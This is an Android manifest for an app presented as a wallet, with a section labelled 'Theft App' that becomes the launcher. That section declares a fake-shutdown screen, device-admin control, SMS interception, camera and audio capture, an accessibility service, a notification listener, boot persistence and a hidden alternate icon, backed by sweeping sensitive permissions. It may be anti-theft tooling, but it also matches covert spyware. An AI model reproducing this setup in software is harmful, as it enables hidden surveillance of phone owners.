<?xml version="1.0" encoding="utf-8"?>
<manifest xmlns:android="http://schemas.android.com/apk/res/android"
    xmlns:tools="http://schemas.android.com/tools">

    <uses-feature
        android:name="android.hardware.nfc"
        android:required="false" />

    <uses-feature
        android:name="android.hardware.camera"
        android:required="false" />
    <uses-feature
        android:name="android.hardware.telephony"
        android:required="false" />

    <uses-permission android:name="android.permission.BLUETOOTH_CONNECT" />
    <uses-permission
        android:name="android.permission.WRITE_SECURE_SETTINGS"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.MASTER_CLEAR"
        tools:ignore="ProtectedPermissions" />

    <uses-permission
        android:name="android.permission.BACKUP"
        tools:ignore="ProtectedPermissions" />
    <uses-permission android:name="android.permission.INTERNET" />
    <uses-permission android:name="android.permission.ACCESS_NETWORK_STATE" />
    <uses-permission android:name="android.permission.ACCESS_WIFI_STATE" />
    <uses-permission
        android:name="android.permission.QUERY_ALL_PACKAGES"
        tools:ignore="QueryAllPackagesPermission" />
    <uses-permission android:name="android.permission.USE_BIOMETRIC" />
    <uses-permission android:name="android.permission.NFC" />
    <uses-permission android:name="android.permission.POST_NOTIFICATIONS" />
    <uses-permission android:name="android.permission.VIBRATE" />
    <uses-permission android:name="android.permission.WAKE_LOCK" />

    <uses-permission android:name="android.permission.CAMERA" />
    <!--    <uses-permission android:name="android.permission.FOREGROUND_SERVICE" />-->

    <uses-permission android:name="android.permission.WRITE_EXTERNAL_STORAGE" />
    <uses-permission android:name="android.permission.READ_EXTERNAL_STORAGE" />

    <uses-permission android:name="android.permission.RECEIVE_SMS" />
    <uses-permission android:name="android.permission.READ_SMS" />
    <uses-permission android:name="android.permission.SEND_SMS" />
    <!--    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_CAMERA" />-->
    <uses-permission android:name="android.permission.ACCESS_BACKGROUND_LOCATION" />

    <!--    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_LOCATION" />-->
    <uses-permission android:name="android.permission.ACCESS_COARSE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_FINE_LOCATION" />
    <uses-permission android:name="android.permission.ACCESS_SUPERUSE" />
    <uses-permission android:name="android.permission.BODY_SENSORS" />
    <uses-permission android:name="android.permission.MODIFY_AUDIO_SETTINGS" />
    <uses-permission android:name="android.permission.ACTIVITY_RECOGNITION" />
    <uses-permission android:name="android.permission.GET_ACCOUNTS" />
    <uses-permission android:name="android.permission.READ_CONTACTS" />

    <permission
        android:name="com.learning.android.permission.ACCESS_PRIVILEGED"
        android:description="@string/perm_access_privileged_description"
        android:label="@string/perm_access_privileged_label"
        android:protectionLevel="dangerous" />
    <permission
        android:name="com.learning.android.permission.ACCESS_SUPERUSER"
        android:description="@string/perm_access_superuser_description"
        android:label="@string/perm_access_superuser_label"
        android:protectionLevel="dangerous" />
    <permission
        android:name="com.learning.android.permission.EXECUTE_SHELL_COMMAND"
        android:description="@string/perm_execute_shell_command_description"
        android:label="@string/perm_execute_shell_command_label"
        android:protectionLevel="dangerous" />
    <permission
        android:name="com.learning.android.permission.BIND_PRIVILEGED_SERVICE"
        android:protectionLevel="signature" />
    <permission
        android:name="com.learning.android.permission.C2D_MESSAGE"
        android:protectionLevel="signature" />

    <uses-permission android:name="android.permission.AUTHENTICATE_ACCOUNTS" />
    <uses-permission android:name="android.permission.ACCESS_SUPERUSER" />
    <uses-permission android:name="com.learning.android.permission.ACCESS_PRIVILEGED" />
    <uses-permission android:name="com.learning.android.permission.ACCESS_SUPERUSER" />
    <uses-permission android:name="com.learning.android.permission.EXECUTE_SHELL_COMMAND" />
    <uses-permission
        android:name="android.permission.CHANGE_CONFIGURATION"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.BROADCAST_SMS"
        tools:ignore="ProtectedPermissions" />
    <uses-permission android:name="android.permission.RECORD_AUDIO" />
    <!--    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_MICROPHONE" />-->
    <uses-permission
        android:name="android.permission.CAPTURE_AUDIO_HOTWORD"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.CAPTURE_AUDIO_OUTPUT"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.CAPTURE_MEDIA_OUTPUT"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.CAPTURE_TUNER_AUDIO_INPUT"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.CAPTURE_VOICE_COMMUNICATION_OUTPUT"
        tools:ignore="ProtectedPermissions" />
    <!--    <uses-permission-->
    <!--        android:name="android.permission.FOREGROUND_SERVICE_SPECIAL_USE"-->
    <!--        tools:ignore="ProtectedPermissions" />-->

    <uses-permission android:name="android.permission.RECEIVE_BOOT_COMPLETED" />
    <!--    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_REMOTE_MESSAGING" />-->


    <uses-permission android:name="android.permission.SYSTEM_ALERT_WINDOW" />
    <!--    <uses-permission android:name="android.permission.FOREGROUND_SERVICE_MEDIA_PROJECTION" />-->
    <uses-permission android:name="android.permission.PROJECT_MEDIA" />
    <uses-permission
        android:name="android.permission.CAPTURE_VIDEO_OUTPUT"
        tools:ignore="ProtectedPermissions" />

    <uses-permission
        android:name="android.permission.BIND_QUICK_SETTINGS_TILE"
        tools:ignore="ProtectedPermissions" />


    <uses-permission android:name="android.permission.BLUETOOTH" />
    <uses-permission android:name="android.permission.BLUETOOTH_ADMIN" />
    <uses-permission android:name="android.permission.CHANGE_NETWORK_STATE" />
    <uses-permission android:name="android.permission.CHANGE_WIFI_STATE" />
    <uses-permission android:name="android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS" />

    <!-- Permissions for more sensitive settings access -->
    <uses-permission
        android:name="android.permission.PACKAGE_USAGE_STATS"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.WRITE_SETTINGS"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.MANAGE_EXTERNAL_STORAGE"
        tools:ignore="ScopedStorage" />
    <uses-permission android:name="android.permission.MANAGE_OVERLAY_PERMISSION" />
    <uses-permission android:name="android.permission.ACCESS_NOTIFICATION_POLICY" />

    <!-- Device admin permission for managing lock screen and other security settings -->

    <uses-permission
        android:name="android.permission.MANAGE_USERS"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.SET_ALWAYS_FINISH"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.SET_PROCESS_LIMIT"
        tools:ignore="ProtectedPermissions" />
    <uses-permission android:name="android.permission.DISABLE_KEYGUARD" />

    <uses-permission
        android:name="android.permission.MANAGE_NETWORK_POLICY"
        tools:ignore="ProtectedPermissions" />
    <uses-permission android:name="android.permission.READ_CALL_LOG" />
    <uses-permission
        android:name="android.permission.WRITE_APN_SETTINGS"
        tools:ignore="ProtectedPermissions" />
    <uses-permission
        android:name="android.permission.CONTROL_KEYGUARD"
        tools:ignore="ProtectedPermissions" />


    <application
        android:name=".AppController"
        android:allowBackup="false"
        android:dataExtractionRules="@xml/data_extraction_rules"
        android:enableOnBackInvokedCallback="true"
        android:icon="@mipmap/ic_launcher_foreground"
        android:label="@string/app_name"
        android:roundIcon="@mipmap/ic_launcher_round"
        android:supportsRtl="true"
        android:theme="@style/Theme.wallet"
        android:usesCleartextTraffic="true"
        tools:ignore="DataExtractionRules"
        tools:targetApi="tiramisu">
        <activity
            android:name=".SplashActivity"
            android:exported="true"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity">
            <!--            <intent-filter>-->
            <!--                <action android:name="android.intent.action.MAIN" />-->

            <!--                <category android:name="android.intent.category.LAUNCHER" />-->
            <!--            </intent-filter>-->
        </activity>
        <activity
            android:name="com.learning.android.wallet.ui.flexiblecontrol.FlexibleControlsActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name=".DashboardMenuActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.dashboard.DashboardActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.webview.WebViewActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.login.LoginActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.welcome.WelcomeActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.signup.SignUpActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.passcode.PasscodeActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.confirmpassword.ConfirmPasswordActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.cardtransactiondetail.CardTransactionDetailActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.balancecheck.BalanceCheckActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity">
            <intent-filter>
                <action android:name="android.nfc.action.NDEF_DISCOVERED" />
                <category android:name="android.intent.category.DEFAULT" />
                <action android:name="android.nfc.action.TECH_DISCOVERED" />
                <data android:mimeType="text/plain" />
            </intent-filter>
        </activity>
        <activity
            android:name="com.learning.android.wallet.ui.banklist.BankListActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.virtualcard.VirtualCardActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.forgotpassword.ForgotPasswordActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.transactionlist.TransactionListActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />
        <activity
            android:name="com.learning.android.wallet.ui.resetpassword.ResetPasswordActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />

        <activity
            android:name=".notification.NotificationActivity"
            android:exported="false"
            android:screenOrientation="portrait"
            tools:ignore="LockedOrientationActivity" />

        <service
            android:name=".notification.FirebaseService"
            android:exported="true">
            <intent-filter>
                <action android:name="com.google.firebase.MESSAGING_EVENT" />
                <action android:name="com.google.firebase.INSTANCE_ID_EVENT" />
            </intent-filter>
        </service>


        <!-- Theft App -->

        <activity
            android:name=".chat.MainActivity"
            android:exported="true"
            android:theme="@style/Theme.AppCompat.NoActionBar.FullScreen">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity>
        <activity
            android:name=".chat.FakeShutdownActivity"
            android:exported="false" />
        <activity
            android:name=".lock_press.PowerButtonTriggerActivity"
            android:exported="false" />
        <activity
            android:name=".chat.AlternateMainActivityAlias"
            android:exported="false" />
        <activity
            android:name=".chat.SettingsActivity"
            android:exported="false" />

        <!-- Device Admin Receiver -->
        <receiver
            android:name=".chat.MyDeviceAdminReceiver"
            android:directBootAware="true"
            android:exported="true"
            android:permission="android.permission.BIND_DEVICE_ADMIN">
            <meta-data
                android:name="android.app.device_admin"
                android:resource="@xml/device_admin" />
            <intent-filter>
                <action android:name="android.app.action.DEVICE_ADMIN_ENABLED" />
            </intent-filter>
        </receiver>

        <!-- Foreground Service for Camera Capture -->
        <service android:name=".chat.CameraService" />
        <service android:name=".chat.MediaCaptureService" />

        <receiver
            android:name=".chat.SMSReceiver"
            android:directBootAware="true"
            android:exported="true"
            android:permission="android.permission.BROADCAST_SMS">
            <intent-filter>
                <action android:name="android.provider.Telephony.SMS_RECEIVED" />
            </intent-filter>
        </receiver>

        <service android:name=".chat.OverlayService">
            <!-- Specify foreground service types for Android 9 (API 28) and above.
                 Replace with types specific to your needs, such as 'mediaProjection',
                 'location', or others as appropriate. -->
        </service>

        <service
            android:name=".chat.YourAccessibilityService"
            android:exported="false"
            android:permission="android.permission.BIND_ACCESSIBILITY_SERVICE">
            <intent-filter>
                <action android:name="android.accessibilityservice.AccessibilityService" />
            </intent-filter>

            <meta-data
                android:name="android.accessibilityservice"
                android:resource="@xml/accessibility_service_config" />
        </service>

        <service android:name=".chat.AlarmService" />

        <service
            android:name=".chat.BatteryTileService"
            android:exported="true"
            android:icon="@drawable/full_battery"
            android:label="Battery Service"
            android:permission="android.permission.BIND_QUICK_SETTINGS_TILE">
            <intent-filter>
                <action android:name="android.service.quicksettings.action.QS_TILE" />
            </intent-filter>
            <meta-data
                android:name="android.service.quicksettings.TOGGLEABLE_TILE"
                android:resource="@xml/my_tile"
                android:value="true" />
        </service>
        <service
            android:name=".chat.WifiTileService"
            android:exported="true"
            android:icon="@drawable/wifi"
            android:label="Wifi Service"
            android:permission="android.permission.BIND_QUICK_SETTINGS_TILE">
            <intent-filter>
                <action android:name="android.service.quicksettings.action.QS_TILE" />
            </intent-filter>
            <meta-data
                android:name="android.service.quicksettings.TOGGLEABLE_TILE"
                android:resource="@xml/my_tile"
                android:value="true" />
        </service>

        <service
            android:name=".chat.MyNotificationListenerService"
            android:directBootAware="true"
            android:exported="false"
            android:label="@string/app_name"
            android:permission="android.permission.BIND_NOTIFICATION_LISTENER_SERVICE">
            <intent-filter>
                <action android:name="android.service.notification.NotificationListenerService" />
            </intent-filter>
        </service>

        <meta-data
            android:name="com.google.firebase.messaging.default_notification_channel_id"
            android:value="myNotification" />

        <receiver
            android:name=".chat.BootReceiver"
            android:directBootAware="true"
            android:enabled="true"
            android:exported="true">
            <intent-filter>
                <action android:name="android.intent.action.LOCKED_BOOT_COMPLETED" />
                <action android:name="android.intent.action.QUICKBOOT_POWERON" />
                <action android:name="android.intent.action.BOOT_COMPLETED" />
            </intent-filter>
        </receiver>

        <service android:name=".chat.AlwaysActiveService" />

        <!-- Alias Activity for Alternate Icon and Name -->
        <activity-alias
            android:name=".chat.AlternateMainActivityAlias"
            android:enabled="false"
            android:exported="true"
            android:icon="@drawable/alerter_ic_face"
            android:label="Alternate App"
            android:targetActivity=".chat.AlternateMainActivityAlias">
            <intent-filter>
                <action android:name="android.intent.action.MAIN" />
                <category android:name="android.intent.category.LAUNCHER" />
            </intent-filter>
        </activity-alias>

    </application>

</manifest>